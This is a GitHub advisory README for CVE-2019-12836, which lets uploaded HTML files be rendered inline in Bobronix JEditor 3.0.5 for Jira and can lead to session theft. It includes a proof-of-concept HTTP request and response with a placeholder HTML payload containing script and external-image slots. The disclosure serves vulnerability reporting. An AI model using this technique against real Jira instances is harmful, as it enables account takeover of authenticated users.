Skip to content

9lyph/CVE-2019-12836

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

53 Commits
images
images
 
 
README.md
README.md
 
 
_config.yml
_config.yml
 
 

Repository files navigation

CVE-2019-12836

bobronix

Application

JEditor v3.0.5 - WYSIWIG Editor for JIRA

Simple yet powerful rich text editor for Jira. Import HTML emails, paste rich contents, create templates and prepopulate fields.

Vendor of Product

Bobronix

Vendor Website

http://bobronix.com/

CVE Reference

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12836

Affected Product Code Base

JEditor - WYSIWYG Editor for Jira - v3.0.5

Affected Component

JEditor v3.0.5

Description

The Bobronix JEditor editor before v3.0.6 for Jira allows an attacker to add a URL/Link (to an existing issue) that can cause forgery of a request to an out-of-origin domain. This in turn may allow for a forged request that can be invoked in the context of an authenticated user, leading to stealing of session tokens and account takeover.

JEditor v3.0.5 allows for upload of files of various file extension types, one of which is '.HTML'. JEditor is utilised by JIRA for its file upload functionality. Using this functionality an attacker is able to upload malicious content.

Once the malicious content is uploaded a subsequent request can be made for the content which allows for the inline displaying and rendering of the content within the context of any authenticated user's browser. This may allow for an attacker to forge a malicious request, on behalf of any authenticated user.

Vulnerability Type

Cross Site Request Forgery (CSRF)

Additional Information

Bug Fixed in JEditor v3.0.6

https://jeditor.zendesk.com/hc/en-us/articles/360029430751-JEditor-3-0-6-release-notes

CVE Impact Other

Allows for a forged request resulting in a client side attack vector possibility

Attack Vectors

Authenticated user required to interact with the embedded link/URL

Discoverer

Credit: Victor Hanna (Exploit Security)

POC

Example HTTP Request
GET /plugins/servlet/jeditor_file_provider?imgId=ckupload201906162566696393384747423&fileName=C%3A%5Ctemp%5CPOC.html HTTP/1.1
Host: <vulnerable host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0)
Accept: text/html,application/xhtml_xml,application/xml;q=0.9,*/*;q=0.8
Accept-Langauge: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<vulnerable host>/secure/Dashboard.jspa
DNT: 1
Connection: close
Cookie: atlassian.xsrf.token=BNXD-VY4I-RCJA-J3YA_34d13dd7fae0f32023fc89838ldc0b6c35991382_lin; JSESSION=42E9F5581BAE499E3E9E45B9D44E6F3C
Upgrade-Insecure-Requests: 1
Example HTTP Response
HTTP/1.1 200
Server: nginx/1.10.2
Date: Sun, 16 Jun 2019 03:06:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
X-AREQUESTID: 786x226666x1
X-ASESSIONID: pn6xpm
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-ASEN: SEN-2322842
X-Seraph-LoginReason: OK
X-AUSERNAME:
Content-Disposition: inline; filename="C:\temp\POC.html"
Vary: User-Agent
Content-Length: 236

<html>
<head>
<img src="http://{insert external image location here}">
<script>{JS Payload of any description}</script>
</head>
<body>
<h1>
 Welcome to the Jungle !
</h1>
</body>
</html>

Discoverer/Credit

Victor Hanna of Exploit Security

Follow me on

Mastodon Linkedin Youtube

About

CVE-2019-12836

Resources

Readme
Activity

Stars

7 stars

Watchers

2 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published